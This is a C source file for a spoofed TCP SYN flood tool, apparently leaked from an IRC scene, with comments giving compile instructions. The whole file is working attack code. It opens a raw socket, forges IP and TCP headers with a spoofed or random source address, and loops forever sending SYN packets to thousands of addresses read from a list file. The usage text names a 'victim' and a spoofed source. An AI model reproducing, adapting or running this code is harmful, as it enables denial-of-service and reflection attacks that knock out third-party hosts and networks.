nsdap.c

1. //leaked by storm@efnet
2. //nsdap.c
3. //aka killall lol
4. //this is a tcp flood [so dont listen to cry lol] mr udp flood
5. //its shit dont use it lol
6. //compile it [gcc nsdap.c -o nsdap]
7.  
8. #include <netinet/tcp.h>
9. #include <stdio.h>
10. #include <unistd.h>
11. #include <stdlib.h>
12. #include <sys/types.h>
13. #include <sys/socket.h>
14. #include <netinet/in.h>
15. #include <netdb.h>
16. #include <signal.h>
17. #include <string.h>
18.  
19. #define ENDIAN_LITTLE
20. #define IPLISTSIZE 15000
21. #define TH_SYN     0x02
22.  
23. int rawsock = 0;
24. unsigned int start;
25. unsigned int packets = 0;
26. unsigned short databytes = 0;
27. unsigned long ip_list[IPLISTSIZE];
28. FILE *ipfile = NULL;
29.  
30. unsigned short
31. csum (unsigned short *addr, int len)
32. {
33.   int nleft = len;
34.   unsigned int sum = 0;
35.   unsigned short *w = addr;
36.   unsigned short answer = 0;
37.  
38.   while (nleft > 1)
39.     {
40.       sum += *w++;
41.       nleft -= 2;
42.     }
43.   if (nleft == 1)
44.     {
45.       *(unsigned char *) (&answer) = *(unsigned char *) w;
46.       sum += answer;
47.     }
48.   sum = (sum >> 16) + (sum & 0xffff);
49.   sum += (sum >> 16);
50.   answer = ~sum;
51.   return (answer);
52. }
53.  
54. struct tcphdr2
55. {
56.   unsigned short th_sport;  /* source port */
57.   unsigned short th_dport;  /* destination port */
58.   unsigned int th_seq;      /* sequence number */
59.   unsigned int th_ack;      /* acknowledgement number */
60.   unsigned char th_x2:4;    /* (unused) */
61.   unsigned char th_off:4;   /* data offset */
62.   unsigned char th_flags;
63.   unsigned short th_win;    /* window */
64.   unsigned short th_sum;    /* checksum */
65.   unsigned short th_urp;    /* urgent pointer */
66. };
67.  
68. struct ip
69. {
70. #ifdef ENDIAN_LITTLE
71.   unsigned int ip_hl:4;     /* header length */
72.   unsigned int ip_v:4;      /* version */
73. #else
74.   unsigned int ip_v:4;      /* version */
75.   unsigned int ip_hl:4;     /* header length */
76. #endif
77.   unsigned char ip_tos;     /* type of service */
78.   unsigned short ip_len;    /* total length */
79.   unsigned short ip_id;     /* identification */
80.   unsigned short ip_off;    /* fragment offset field */
81. #define IP_RF 0x8000        /* reserved fragment flag */
82. #define IP_DF 0x4000        /* dont fragment flag */
83. #define IP_MF 0x2000        /* more fragments flag */
84. #define IP_OFFMASK 0x1fff   /* mask for fragmenting bits */
85.   unsigned char ip_ttl;     /* time to live */
86.   unsigned char ip_p;       /* protocol */
87.   unsigned short ip_sum;    /* checksum */
88.   struct in_addr ip_src, ip_dst;    /* source and dest address */
89. };
90.  
91. struct ph
92. {               /* rfc 793 tcp pseudo-header */
93.   unsigned long saddr, daddr;
94.   char mbz;
95.   char ptcl;
96.   unsigned short tcpl;
97. };
98.  
99. struct tcp_opthdr
100. {
101.   unsigned char op0;
102.   unsigned char op1;
103.   unsigned char op2;
104.   unsigned char op3;
105.   unsigned char op4;
106.   unsigned char op5;
107.   unsigned char op6;
108.   unsigned char op7;
109. /* we only need this if we use window scaling and timestamps */
110.   unsigned char op8;
111.   unsigned char op9;
112.   unsigned char op10;
113.   unsigned char op11;
114.   unsigned char op12;
115.   unsigned char op13;
116.   unsigned char op14;
117.   unsigned char op15;
118.   unsigned char op16;
119.   unsigned char op17;
120.   unsigned char op18;
121.   unsigned char op19;
122. };
123.  
124. struct
125. {
126.   char buf[1551];       /* 64 kbytes for the packet */
127.   char ph[1551];        /* 64 bytes for the paeudo header packet */
128. } tcpbuf;
129.  
130. unsigned int
131. lookup (char *hostname)
132. {
133.   struct hostent *name;
134.   unsigned int address;
135.  
136.   if ((address = inet_addr (hostname)) != -1)
137.     return address;
138.   if ((name = gethostbyname (hostname)) == NULL)
139.     return -1;
140.  
141.   memcpy (&address, name->h_addr, name->h_length);
142.   return address;
143. }
144.  
145. void
146. handle_exit ()
147. {
148.   printf ("Flood completed, %d packets sent, %d seconds, %d packets/sec\n",
149.       packets, time (NULL) - start, packets / (time (NULL) - start));
150.   exit (0);
151. }
152.  
153. void read_list(void)
154. {
155.     int x=0;
156.     int errcount=0;
157.  
158.     if (ipfile == NULL)
159.     {
160.         if ( (ipfile=fopen("list","r")) == NULL)
161.         {
162.             fprintf(stderr, "Can't open ip file\n");
163.             exit(0x0);
164.         }
165.     }
166.  
167.     while (x <= IPLISTSIZE-1)
168.     {
169.         char buf[32];
170.         char *nl=NULL;
171.         int bc = 0;
172.         memset(&buf,0,32);
173.         while (fgets(buf, 32, ipfile) == NULL)
174.         {
175.             rewind(ipfile);
176.             errcount++;
177.             if (errcount > 32)
178.             {
179.                 fprintf(stderr, "Couldn't read from IP list\n");
180.                 exit(0);
181.             }
182.         }
183.         errcount = 0;
184.         bc = strlen(buf);
185.         while (buf[bc-1] == '\r' || buf[bc-1] == '\n') // chop off CRLF
186.             buf[bc-1] = 0;
187.  
188.         ip_list[x] = inet_addr(buf);
189.         x++;
190.     }
191. }
192.  
193. void
194. attack (unsigned int srcip, unsigned short dstport,
195.     unsigned short srcport)
196. {
197.   struct sockaddr_in sin;
198.   int x, something=0;
199.   unsigned long y = 0UL;
200.   FILE *ipfile;
201.   char *xptr, buf[200];
202.   struct ip *xf_iphdr = (struct ip *) tcpbuf.buf;
203.   struct tcphdr2 *xf_tcphdr =
204.     (struct tcphdr2 *) (tcpbuf.buf + sizeof (struct ip));
205.   struct tcp_opthdr *xf_tcpopt =
206.     (struct tcp_opthdr *) (tcpbuf.buf + sizeof (struct ip) +
207.                sizeof (struct tcphdr2));
208.  
209. /* for the pseudo header */
210.   struct ph *ps_iphdr = (struct ph *) tcpbuf.ph;
211.   struct tcphdr2 *ps_tcphdr =
212.     (struct tcphdr2 *) (tcpbuf.ph + sizeof (struct ph));
213.   struct tcp_opthdr *ps_tcpopt =
214.     (struct tcp_opthdr *) (tcpbuf.ph + sizeof (struct ph) +
215.                sizeof (struct tcphdr2));
216.  
217. /* fill the packets with random data */
218. /*  for (x = 0; x <= sizeof (tcpbuf.buf); x++)
219.     {
220.       tcpbuf.buf[x] = random ();
221.     } */
222. /* duplicate */
223.   memcpy (tcpbuf.ph, tcpbuf.buf, sizeof (tcpbuf.ph));
224.  
225.  
226.   xf_iphdr->ip_v = 4;
227.   xf_iphdr->ip_hl = 5;
228.   xf_iphdr->ip_tos = 0;
229.  
230. #ifdef MACOS
231.   xf_iphdr->ip_len =
232.     sizeof (struct ip) + sizeof (struct tcphdr2) + sizeof (struct tcp_opthdr);
233.   xf_iphdr->ip_off = 0x4000;
234. #else
235.   xf_iphdr->ip_len =
236.     htons (sizeof (struct ip) + sizeof (struct tcphdr2) +
237.        sizeof (struct tcp_opthdr));
238.   xf_iphdr->ip_off = htons (0x4000);
239. #endif
240.   xf_iphdr->ip_id = htons (random ());  /* random IP id */
241.  
242.   xf_iphdr->ip_ttl = 65535;
243.   xf_iphdr->ip_p = IPPROTO_TCP;
244.  
245.   xf_tcphdr->th_seq = htonl (rand ());
246.  
247.   xf_tcphdr->th_off =
248.     (sizeof (struct tcphdr2) + sizeof (struct tcp_opthdr)) / 4;
249.   xf_tcphdr->th_ack = (random ());
250.  
251. /* large windows are more evil */
252.   xf_tcphdr->th_win = 64240;
253.   xf_tcphdr->th_urp = 0;
254.  
255. /* set the flags */
256.   xf_tcphdr->th_flags = 0x02;
257.  
258. /* source ip */
259.   xf_iphdr->ip_src.s_addr = srcip;
260.  
261. /* option headers */
262. /* mss */
263.   xf_tcpopt->op0 = 2;
264.   xf_tcpopt->op1 = 4;
265.   xf_tcpopt->op2 = 6;
266.   xf_tcpopt->op3 = 0xb4;
267.  
268. /* sackok */
269.   xf_tcpopt->op4 = 4;
270.   xf_tcpopt->op5 = 2;
271.  
272. /* timestamp */
273.   xf_tcpopt->op6 = 8;
274.   xf_tcpopt->op7 = 0x0a;
275.   xf_tcpopt->op8 = 0xb2;
276.   xf_tcpopt->op9 = 8;
277.   xf_tcpopt->op10 = 0xf0;
278.   xf_tcpopt->op11 = 0x47;
279.  
280.   xf_tcpopt->op12 = 0;
281.   xf_tcpopt->op13 = 0;
282.   xf_tcpopt->op14 = 0;
283.   xf_tcpopt->op15 = 0;
284. /* nop */
285.   xf_tcpopt->op16 = 0x01;
286. /* window scaling */
287.   xf_tcpopt->op17 = 0x03;
288.   xf_tcpopt->op18 = 0x03;
289.   xf_tcpopt->op19 = 0x04;
290.  
291.  
292. /* *** Pseudo Header *** */
293.   ps_iphdr->mbz = 0;
294.   ps_iphdr->ptcl = IPPROTO_TCP;
295.   ps_iphdr->saddr = xf_iphdr->ip_src.s_addr;
296.   ps_iphdr->tcpl =
297.     htons (sizeof (struct tcphdr2) + sizeof (struct tcp_opthdr) + databytes);
298.  
299.   memcpy (ps_tcphdr, xf_tcphdr, sizeof (struct tcphdr2));
300.   memcpy (ps_tcpopt, xf_tcpopt, sizeof (struct tcp_opthdr));
301.  
302.   xf_tcphdr->th_sport = htons (srcport);
303.   xf_tcphdr->th_dport = htons (dstport);
304.  
305.   ps_tcphdr->th_sport = htons (srcport);
306.   ps_tcphdr->th_dport = htons (dstport);
307.  
308.   read_list();
309.  
310.   printf ("Sending packets of size %d....\n",
311.       sizeof (struct ph) + sizeof (struct tcphdr2) +
312.       sizeof (struct tcp_opthdr) + databytes);
313.  
314.   y = 0UL;
315.   for (;;)
316.     {
317.         ps_iphdr->daddr = ip_list[y];
318.         xf_iphdr->ip_dst.s_addr = ip_list[y];
319.  
320.  
321.       if (dstport == 0)
322.     {           /* random dest ports */
323.       xf_tcphdr->th_dport = random ();
324.       ps_tcphdr->th_dport = xf_tcphdr->th_dport;
325.     }
326.       if (srcport == 0)
327.     {
328.       xf_tcphdr->th_sport = random ();
329.       ps_tcphdr->th_sport = xf_tcphdr->th_sport;
330.     }
331.  
332.       if (srcip == 0)
333.     {           /* random source */
334.       xf_iphdr->ip_src.s_addr = rand ();
335.       ps_iphdr->saddr = xf_iphdr->ip_src.s_addr;
336.     }
337.  
338.  
339. /* we could do this globally too */
340.       sin.sin_family = AF_INET;
341.       sin.sin_port = xf_tcphdr->th_dport;
342.       sin.sin_addr.s_addr = ps_iphdr->daddr;
343.  
344.  
345. /* calculate tcp checksum */
346.       xf_tcphdr->th_sum = 0;
347.       xf_tcphdr->th_sum =
348.     csum ((unsigned short *) tcpbuf.ph,
349.           sizeof (struct ph) + sizeof (struct tcphdr2) +
350.           sizeof (struct tcp_opthdr) + databytes);
351.  
352. /* send */
353. //printf ("Sending packet size %d %d\n", sizeof (struct ip) + sizeof (struct tcphdr2) + sizeof (struct tcp_opthdr) + databytes, ps_iphdr->tcpl);
354. //sleep(1);
355.       sendto (rawsock, tcpbuf.buf,
356.           sizeof (struct ip) + sizeof (struct tcphdr2) +
357.           sizeof (struct tcp_opthdr) + databytes, 0,
358.           (struct sockaddr *) &sin, sizeof (sin));
359.       packets++;
360.  
361.       y++;
362.       if (y > IPLISTSIZE-1 || ip_list[y] == 0)
363.       {
364.           y = 0UL;
365.           read_list();
366.       }
367.     }
368.  
369. }
370.  
371. main (int argc, char **argv)
372. {
373.   char list[30];
374.   unsigned int srcip;
375.   unsigned short dstport, srcport;
376.   unsigned long x = 0UL;
377.   int hincl = 1;
378.  
379. /* parse arguments */
380.   if (argc < 5)
381.     {
382.       printf ("usage : %s dest list destport srcport [size]\n\n",
383.           argv[0]);
384.       printf ("dest       = the victim ip/host\n");
385.       printf ("src        = ip to spoof the attack as\n");
386.       printf ("destport   = port to attack on the victim\n");
387.       printf ("srcport    = port which the packets will come from\n");
388.       printf ("size       = tcp packet size (not inc header)\n");
389.  
390.       exit (0);
391.     }
392.  
393. /* allocate socket */
394.   rawsock = socket (AF_INET, SOCK_RAW, IPPROTO_RAW);
395.   if (rawsock <= 0)
396.     {
397.       printf ("Error opening raw socket\n");
398.       exit (-1);
399.     }
400.  
401.      setsockopt(rawsock, IPPROTO_IP, IP_HDRINCL, &hincl, sizeof(hincl));
402.  
403.  
404.   srcip = lookup (argv[1]);
405.   if (srcip <= 0)
406.     {
407.       printf ("Cant resolve source address\n");
408.     }
409.  
410.       databytes = 0;
411.   dstport = atoi (argv[3]);
412.   srcport = atoi (argv[4]);
413.  
414.   for (x=0; x < IPLISTSIZE; x++)
415.     ip_list[x] = 0;
416.  
417.   signal (SIGINT, handle_exit);
418.   signal (SIGTERM, handle_exit);
419.   signal (SIGQUIT, handle_exit);
420.   start = time (NULL);
421.   attack (srcip, dstport, srcport);
422.  
423. }